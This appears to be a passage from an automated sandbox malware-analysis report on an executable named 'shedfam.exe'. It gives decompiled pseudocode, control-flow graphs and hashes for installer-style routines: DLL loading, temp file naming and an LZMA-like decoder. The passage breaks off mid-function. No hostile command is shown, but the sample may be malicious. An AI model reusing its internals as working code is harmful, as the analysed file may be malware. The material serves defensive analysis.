                                                                  control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                                                                  C-Code - Quality: 100%
                                                                  			E0040601D(intOrPtr _a4) {
                                                                  				char _v292;
                                                                  				int _t10;
                                                                  				struct HINSTANCE__* _t14;
                                                                  				void* _t16;
                                                                  				void* _t21;
                                                                  
                                                                  				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                  				if(_t10 > 0x104) {
                                                                  					_t10 = 0;
                                                                  				}
                                                                  				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                  					_t16 = 1;
                                                                  				} else {
                                                                  					_t16 = 0;
                                                                  				}
                                                                  				_t5 = _t16 + 0x409010; // 0x5c
                                                                  				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                  				_t14 = LoadLibraryA( &_v292); // executed
                                                                  				return _t14;
                                                                  			}








                                                                  0x00406034
                                                                  0x0040603d
                                                                  0x0040603f
                                                                  0x0040603f
                                                                  0x00406043
                                                                  0x00406055
                                                                  0x0040604f
                                                                  0x0040604f
                                                                  0x0040604f
                                                                  0x00406059
                                                                  0x0040606d
                                                                  0x0040607d
                                                                  0x00406084

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$\
                                                                  • API String ID: 2200240437-500877883
                                                                  • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                                  • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                                                                  • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                                  • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                                                                  C-Code - Quality: 100%
                                                                  			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                  				signed int _t11;
                                                                  				int _t14;
                                                                  				signed int _t16;
                                                                  				void* _t19;
                                                                  				CHAR* _t20;
                                                                  
                                                                  				_t20 = _a4;
                                                                  				_t19 = 0x64;
                                                                  				while(1) {
                                                                  					_t19 = _t19 - 1;
                                                                  					_a4 = 0x61736e;
                                                                  					_t11 = GetTickCount();
                                                                  					_t16 = 0x1a;
                                                                  					_a6 = _a6 + _t11 % _t16;
                                                                  					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                  					if(_t14 != 0) {
                                                                  						break;
                                                                  					}
                                                                  					if(_t19 != 0) {
                                                                  						continue;
                                                                  					}
                                                                  					 *_t20 =  *_t20 & 0x00000000;
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t20;
                                                                  			}








                                                                  0x00405a05
                                                                  0x00405a0b
                                                                  0x00405a0c
                                                                  0x00405a0c
                                                                  0x00405a0d
                                                                  0x00405a14
                                                                  0x00405a1e
                                                                  0x00405a2b
                                                                  0x00405a2e
                                                                  0x00405a36
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a3a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405a3c
                                                                  0x00000000
                                                                  0x00405a3c
                                                                  0x00000000

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405A14
                                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-2428351063
                                                                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                  • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                                                                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                  • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 518 406184-4061a7 519 4061b1-4061b4 518->519 520 4061a9-4061ac 518->520 522 4061b7-4061c0 519->522 521 406bd1-406bd5 520->521 523 4061c6 522->523 524 406bce 522->524 525 406272-406276 523->525 526 4062e2-4062e6 523->526 527 4061cd-4061d1 523->527 528 40630d-4069b4 523->528 524->521 534 406b22-406b2c 525->534 535 40627c-406295 525->535 531 406b31-406b3b 526->531 532 4062ec-406300 526->532 529 4061d7-4061e4 527->529 530 406bb9-406bcc 527->530 538 4069b6-4069cc 528->538 539 4069ce-4069e4 528->539 529->524 536 4061ea-406230 529->536 530->521 531->530 537 406303-40630b 532->537 534->530 540 406298-40629c 535->540 541 406232-406236 536->541 542 406258-40625a 536->542 537->526 537->528 543 4069e7-4069ee 538->543 539->543 540->525 544 40629e-4062a4 540->544 545 406241-40624f GlobalAlloc 541->545 546 406238-40623b GlobalFree 541->546 547 406268-406270 542->547 548 40625c-406266 542->548 549 4069f0-4069f4 543->549 550 406a15-406a21 543->550 551 4062a6-4062ad 544->551 552 4062ce-4062e0 544->552 545->524 553 406255 545->553 546->545 547->540 548->547 548->548 554 406ba3-406bad 549->554 555 4069fa-406a12 549->555 550->522 557 4062b8-4062c8 GlobalAlloc 551->557 558 4062af-4062b2 GlobalFree 551->558 552->537 553->542 554->530 555->550 557->524 557->552 558->557
                                                                  C-Code - Quality: 98%
                                                                  			E00406184(void* __ecx) {
                                                                  				void* _v8;
                                                                  				void* _v12;
                                                                  				signed int _v16;
                                                                  				unsigned int _v20;
                                                                  				signed int _v24;
                                                                  				signed int _v28;
                                                                  				signed int _v32;
                                                                  				signed int _v36;
                                                                  				signed int _v40;
                                                                  				signed int _v44;
                                                                  				signed int _v48;
                                                                  				signed int _v52;
                                                                  				signed int _v56;
                                                                  				signed int _v60;
                                                                  				signed int _v64;
                                                                  				signed int _v68;
                                                                  				signed int _v72;
                                                                  				signed int _v76;
                                                                  				signed int _v80;
                                                                  				signed int _v84;
                                                                  				signed int _v88;
                                                                  				signed int _v92;
                                                                  				signed int _v95;
                                                                  				signed int _v96;
                                                                  				signed int _v100;
                                                                  				signed int _v104;
                                                                  				signed int _v108;
                                                                  				signed int _v112;
                                                                  				signed int _v116;
                                                                  				signed int _v120;
                                                                  				intOrPtr _v124;
                                                                  				signed int _v128;
                                                                  				signed int _v132;
                                                                  				signed int _v136;
                                                                  				void _v140;
                                                                  				void* _v148;
                                                                  				signed int _t537;
                                                                  				signed int _t538;
                                                                  				signed int _t572;
                                                                  
                                                                  				_t572 = 0x22;
                                                                  				_v148 = __ecx;
                                                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                                                  				if(_v52 == 0xffffffff) {
                                                                  					return 1;
                                                                  				}
                                                                  				while(1) {
                                                                  					L3:
                                                                  					_t537 = _v140;
                                                                  					if(_t537 > 0x1c) {
                                                                  						break;
                                                                  					}
                                                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
                                                                  						case 0:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								goto L173;
                                                                  							}
                                                                  							_v112 = _v112 - 1;
                                                                  							_v116 = _v116 + 1;
                                                                  							_t537 =  *_v116;
                                                                  							__eflags = _t537 - 0xe1;
                                                                  							if(_t537 > 0xe1) {
                                                                  								goto L174;
                                                                  							}
                                                                  							_t542 = _t537 & 0x000000ff;
                                                                  							_push(0x2d);
                                                                  							asm("cdq");
                                                                  							_pop(_t576);
                                                                  							_push(9);
                                                                  							_pop(_t577);
                                                                  							_t622 = _t542 / _t576;
                                                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                                                  							asm("cdq");
                                                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                                                  							_v64 = _t617;
                                                                  							_v32 = (1 << _t622) - 1;
                                                                  							_v28 = (1 << _t544 / _t577) - 1;
                                                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                  							__eflags = 0x600 - _v124;
                                                                  							if(0x600 == _v124) {
                                                                  								L12:
                                                                  								__eflags = _t625;
                                                                  								if(_t625 == 0) {
                                                                  									L14:
                                                                  									_v76 = _v76 & 0x00000000;
                                                                  									_v68 = _v68 & 0x00000000;
                                                                  									goto L17;
                                                                  								} else {
                                                                  									goto L13;
                                                                  								}
                                                                  								do {
                                                                  									L13:
                                                                  									_t625 = _t625 - 1;
                                                                  									__eflags = _t625;
                                                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                  								} while (_t625 != 0);
                                                                  								goto L14;
                                                                  							}
                                                                  							__eflags = _v8;
                                                                  							if(_v8 != 0) {
                                                                  								GlobalFree(_v8);
                                                                  							}
                                                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                  							__eflags = _t537;
                                                                  							_v8 = _t537;
                                                                  							if(_t537 == 0) {
                                                                  								goto L174;
                                                                  							} else {
                                                                  								_v124 = 0x600;
                                                                  								goto L12;
                                                                  							}
                                                                  						case 1:
                                                                  							L15:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 1;
                                                                  								goto L173;
                                                                  							}
                                                                  							_v112 = _v112 - 1;
                                                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                  							_v116 = _v116 + 1;
                                                                  							_t50 =  &_v76;
                                                                  							 *_t50 = _v76 + 1;
                                                                  							__eflags =  *_t50;
                                                                  							L17:
                                                                  							__eflags = _v76 - 4;
                                                                  							if(_v76 < 4) {
                                                                  								goto L15;
                                                                  							}
                                                                  							_t550 = _v68;
                                                                  							__eflags = _t550 - _v120;
                                                                  							if(_t550 == _v120) {
                                                                  								L22:
                                                                  								_v76 = 5;
                                                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                  								goto L25;
                                                                  							}
                                                                  							__eflags = _v12;
                                                                  							_v120 = _t550;
                                                                  							if(_v12 != 0) {
                                                                  								GlobalFree(_v12);
                                                                  							}
                                                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                  							__eflags = _t537;
                                                                  							_v12 = _t537;
                                                                  							if(_t537 == 0) {
                                                                  								goto L174;
                                                                  							} else {
                                                                  								goto L22;
                                                                  							}
                                                                  						case 2:
                                                                  							L26:
                                                                  							_t557 = _v100 & _v32;
                                                                  							_v136 = 6;
                                                                  							_v80 = _t557;
                                                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                  							goto L135;
                                                                  						case 3:
                                                                  							L23:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 3;
                                                                  								goto L173;
                                                                  							}
                                                                  							_v112 = _v112 - 1;
                                                                  							_t72 =  &_v116;
                                                                  							 *_t72 = _v116 + 1;
                                                                  							__eflags =  *_t72;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							L25:
                                                                  							_v76 = _v76 - 1;
                                                                  							__eflags = _v76;
                                                                  							if(_v76 != 0) {
                                                                  								goto L23;
                                                                  							}
                                                                  							goto L26;
                                                                  						case 4:
                                                                  							L136:
                                                                  							_t559 =  *_t626;
                                                                  							_t610 = _t559 & 0x0000ffff;
                                                                  							_t591 = (_v20 >> 0xb) * _t610;
                                                                  							__eflags = _v16 - _t591;
                                                                  							if(_v16 >= _t591) {
                                                                  								_v20 = _v20 - _t591;
                                                                  								_v16 = _v16 - _t591;
                                                                  								_v68 = 1;
                                                                  								_t560 = _t559 - (_t559 >> 5);
                                                                  								__eflags = _t560;
                                                                  								 *_t626 = _t560;
                                                                  							} else {
                                                                  								_v20 = _t591;
                                                                  								_v68 = _v68 & 0x00000000;
                                                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                  							}
                                                                  							__eflags = _v20 - 0x1000000;
                                                                  							if(_v20 >= 0x1000000) {
                                                                  								goto L142;
                                                                  							} else {
                                                                  								goto L140;
                                                                  							}
                                                                  						case 5:
                                                                  							L140:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 5;
                                                                  								goto L173;
                                                                  							}
                                                                  							_v20 = _v20 << 8;
                                                                  							_v112 = _v112 - 1;
                                                                  							_t464 =  &_v116;
                                                                  							 *_t464 = _v116 + 1;
                                                                  							__eflags =  *_t464;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							L142:
                                                                  							_t561 = _v136;
                                                                  							goto L143;
                                                                  						case 6:
                                                                  							__edx = 0;
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								__eax = _v8;
                                                                  								__ecx = _v60;
                                                                  								_v56 = 1;
                                                                  								_v136 = 7;
                                                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                                                  								goto L135;
                                                                  							}
                                                                  							__eax = _v96 & 0x000000ff;
                                                                  							__esi = _v100;
                                                                  							__cl = 8;
                                                                  							__cl = 8 - _v64;
                                                                  							__esi = _v100 & _v28;
                                                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                                                  							__ecx = _v64;
                                                                  							__esi = (_v100 & _v28) << 8;
                                                                  							__ecx = _v8;
                                                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                  							__eflags = _v60 - 4;
                                                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                  							if(_v60 >= 4) {
                                                                  								__eflags = _v60 - 0xa;
                                                                  								if(_v60 >= 0xa) {
                                                                  									_t103 =  &_v60;
                                                                  									 *_t103 = _v60 - 6;
                                                                  									__eflags =  *_t103;
                                                                  								} else {
                                                                  									_v60 = _v60 - 3;
                                                                  								}
                                                                  							} else {
                                                                  								_v60 = 0;
                                                                  							}
                                                                  							__eflags = _v56 - __edx;
                                                                  							if(_v56 == __edx) {
                                                                  								__ebx = 0;
                                                                  								__ebx = 1;
                                                                  								goto L63;
                                                                  							}
                                                                  							__eax = _v24;
                                                                  							__eax = _v24 - _v48;
                                                                  							__eflags = __eax - _v120;
                                                                  							if(__eax >= _v120) {
                                                                  								__eax = __eax + _v120;
                                                                  								__eflags = __eax;
                                                                  							}
                                                                  							__ecx = _v12;
                                                                  							__ebx = 0;
                                                                  							__ebx = 1;
                                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                  							goto L43;
                                                                  						case 7:
                                                                  							__eflags = _v68 - 1;
                                                                  							if(_v68 != 1) {
                                                                  								__eax = _v40;
                                                                  								_v132 = 0x16;
                                                                  								_v36 = _v40;
                                                                  								__eax = _v44;
                                                                  								_v40 = _v44;
                                                                  								__eax = _v48;
                                                                  								_v44 = _v48;
                                                                  								__eax = 0;
                                                                  								__eflags = _v60 - 7;
                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  								__al = __al & 0x000000fd;
                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                  								__eax = _v8;
                                                                  								__eax = _v8 + 0x664;
                                                                  								__eflags = __eax;
                                                                  								_v92 = __eax;
                                                                  								goto L71;
                                                                  							}
                                                                  							__eax = _v8;
                                                                  							__ecx = _v60;
                                                                  							_v136 = 8;
                                                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                                                  							goto L135;
                                                                  						case 8:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								__eax = _v8;
                                                                  								__ecx = _v60;
                                                                  								_v136 = 0xa;
                                                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                  							} else {
                                                                  								__eax = _v60;
                                                                  								__ecx = _v8;
                                                                  								__eax = _v60 + 0xf;
                                                                  								_v136 = 9;
                                                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                  							}
                                                                  							goto L135;
                                                                  						case 9:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								goto L92;
                                                                  							}
                                                                  							__eflags = _v100;
                                                                  							if(_v100 == 0) {
                                                                  								goto L174;
                                                                  							}
                                                                  							__eax = 0;
                                                                  							__eflags = _v60 - 7;
                                                                  							_t264 = _v60 - 7 >= 0;
                                                                  							__eflags = _t264;
                                                                  							0 | _t264 = _t264 + _t264 + 9;
                                                                  							_v60 = _t264 + _t264 + 9;
                                                                  							goto L78;
                                                                  						case 0xa:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								__eax = _v8;
                                                                  								__ecx = _v60;
                                                                  								_v136 = 0xb;
                                                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                  								goto L135;
                                                                  							}
                                                                  							__eax = _v44;
                                                                  							goto L91;
                                                                  						case 0xb:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								__ecx = _v40;
                                                                  								__eax = _v36;
                                                                  								_v36 = _v40;
                                                                  							} else {
                                                                  								__eax = _v40;
                                                                  							}
                                                                  							__ecx = _v44;
                                                                  							_v40 = _v44;
                                                                  							L91:
                                                                  							__ecx = _v48;
                                                                  							_v48 = __eax;
                                                                  							_v44 = _v48;
                                                                  							L92:
                                                                  							__eax = _v8;
                                                                  							_v132 = 0x15;
                                                                  							__eax = _v8 + 0xa68;
                                                                  							_v92 = _v8 + 0xa68;
                                                                  							goto L71;
                                                                  						case 0xc:
                                                                  							L102:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0xc;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t340 =  &_v116;
                                                                  							 *_t340 = _v116 + 1;
                                                                  							__eflags =  *_t340;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							__eax = _v48;
                                                                  							goto L104;
                                                                  						case 0xd:
                                                                  							L39:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0xd;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t127 =  &_v116;
                                                                  							 *_t127 = _v116 + 1;
                                                                  							__eflags =  *_t127;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							L41:
                                                                  							__eax = _v68;
                                                                  							__eflags = _v76 - _v68;
                                                                  							if(_v76 != _v68) {
                                                                  								goto L50;
                                                                  							}
                                                                  							__eflags = __ebx - 0x100;
                                                                  							if(__ebx >= 0x100) {
                                                                  								goto L56;
                                                                  							}
                                                                  							L43:
                                                                  							__eax = _v95 & 0x000000ff;
                                                                  							_v95 = _v95 << 1;
                                                                  							__ecx = _v92;
                                                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                                                  							_v76 = __eax;
                                                                  							__eax = __eax + 1;
                                                                  							__eax = __eax << 8;
                                                                  							__eax = __eax + __ebx;
                                                                  							__esi = _v92 + __eax * 2;
                                                                  							_v20 = _v20 >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							_v88 = __esi;
                                                                  							__edx = __ax & 0x0000ffff;
                                                                  							__ecx = (_v20 >> 0xb) * __edx;
                                                                  							__eflags = _v16 - __ecx;
                                                                  							if(_v16 >= __ecx) {
                                                                  								_v20 = _v20 - __ecx;
                                                                  								_v16 = _v16 - __ecx;
                                                                  								__cx = __ax;
                                                                  								_v68 = 1;
                                                                  								__cx = __ax >> 5;
                                                                  								__eflags = __eax;
                                                                  								__ebx = __ebx + __ebx + 1;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								_v68 = _v68 & 0x00000000;
                                                                  								_v20 = __ecx;
                                                                  								0x800 = 0x800 - __edx;
                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags = _v20 - 0x1000000;
                                                                  							_v72 = __ebx;
                                                                  							if(_v20 >= 0x1000000) {
                                                                  								goto L41;
                                                                  							} else {
                                                                  								goto L39;
                                                                  							}
                                                                  						case 0xe:
                                                                  							L48:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0xe;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t161 =  &_v116;
                                                                  							 *_t161 = _v116 + 1;
                                                                  							__eflags =  *_t161;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							while(1) {
                                                                  								L50:
                                                                  								__eflags = __ebx - 0x100;
                                                                  								if(__ebx >= 0x100) {
                                                                  									break;
                                                                  								}
                                                                  								__eax = _v92;
                                                                  								__edx = __ebx + __ebx;
                                                                  								__ecx = _v20;
                                                                  								__esi = __edx + __eax;
                                                                  								__ecx = _v20 >> 0xb;
                                                                  								__ax =  *__esi;
                                                                  								_v88 = __esi;
                                                                  								__edi = __ax & 0x0000ffff;
                                                                  								__ecx = (_v20 >> 0xb) * __edi;
                                                                  								__eflags = _v16 - __ecx;
                                                                  								if(_v16 >= __ecx) {
                                                                  									_v20 = _v20 - __ecx;
                                                                  									_v16 = _v16 - __ecx;
                                                                  									__cx = __ax;
                                                                  									_t175 = __edx + 1; // 0x1
                                                                  									__ebx = _t175;
                                                                  									__cx = __ax >> 5;
                                                                  									__eflags = __eax;
                                                                  									 *__esi = __ax;
                                                                  								} else {
                                                                  									_v20 = __ecx;
                                                                  									0x800 = 0x800 - __edi;
                                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  									__ebx = __ebx + __ebx;
                                                                  									 *__esi = __cx;
                                                                  								}
                                                                  								__eflags = _v20 - 0x1000000;
                                                                  								_v72 = __ebx;
                                                                  								if(_v20 >= 0x1000000) {
                                                                  									continue;
                                                                  								} else {
                                                                  									goto L48;
                                                                  								}
                                                                  							}
                                                                  							L56:
                                                                  							_t178 =  &_v56;
                                                                  							 *_t178 = _v56 & 0x00000000;
                                                                  							__eflags =  *_t178;
                                                                  							goto L57;
                                                                  						case 0xf:
                                                                  							L60:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0xf;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t208 =  &_v116;
                                                                  							 *_t208 = _v116 + 1;
                                                                  							__eflags =  *_t208;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							L62:
                                                                  							__eflags = __ebx - 0x100;
                                                                  							if(__ebx >= 0x100) {
                                                                  								L57:
                                                                  								__al = _v72;
                                                                  								_v96 = _v72;
                                                                  								goto L58;
                                                                  							}
                                                                  							L63:
                                                                  							__eax = _v92;
                                                                  							__edx = __ebx + __ebx;
                                                                  							__ecx = _v20;
                                                                  							__esi = __edx + __eax;
                                                                  							__ecx = _v20 >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							_v88 = __esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                                  							__eflags = _v16 - __ecx;
                                                                  							if(_v16 >= __ecx) {
                                                                  								_v20 = _v20 - __ecx;
                                                                  								_v16 = _v16 - __ecx;
                                                                  								__cx = __ax;
                                                                  								_t222 = __edx + 1; // 0x1
                                                                  								__ebx = _t222;
                                                                  								__cx = __ax >> 5;
                                                                  								__eflags = __eax;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								_v20 = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags = _v20 - 0x1000000;
                                                                  							_v72 = __ebx;
                                                                  							if(_v20 >= 0x1000000) {
                                                                  								goto L62;
                                                                  							} else {
                                                                  								goto L60;
                                                                  							}
                                                                  						case 0x10:
                                                                  							L112:
                                                                  							__eflags = _v112;
                                                                  							if(_v112 == 0) {
                                                                  								_v140 = 0x10;
                                                                  								goto L173;
                                                                  							}
                                                                  							__ecx = _v116;
                                                                  							__eax = _v16;
                                                                  							_v20 = _v20 << 8;
                                                                  							__ecx =  *_v116 & 0x000000ff;
                                                                  							_v112 = _v112 - 1;
                                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							_t371 =  &_v116;
                                                                  							 *_t371 = _v116 + 1;
                                                                  							__eflags =  *_t371;
                                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                  							goto L114;
                                                                  						case 0x11:
                                                                  							L71:
                                                                  							__esi = _v92;
                                                                  							_v136 = 0x12;
                                                                  							goto L135;
                                                                  						case 0x12:
                                                                  							__eflags = _v68;
                                                                  							if(_v68 != 0) {
                                                                  								__eax = _v92;
                                                                  								_v136 = 0x13;
                                                                  								__esi = _v92 + 2;
                                                                  								L135:
                                                                  								_v88 = _t626;
                                                                  								goto L136;
                                                                  							}
                                                                  							__eax = _v80;
                                                                  							_v52 = _v52 & 0x00000000;
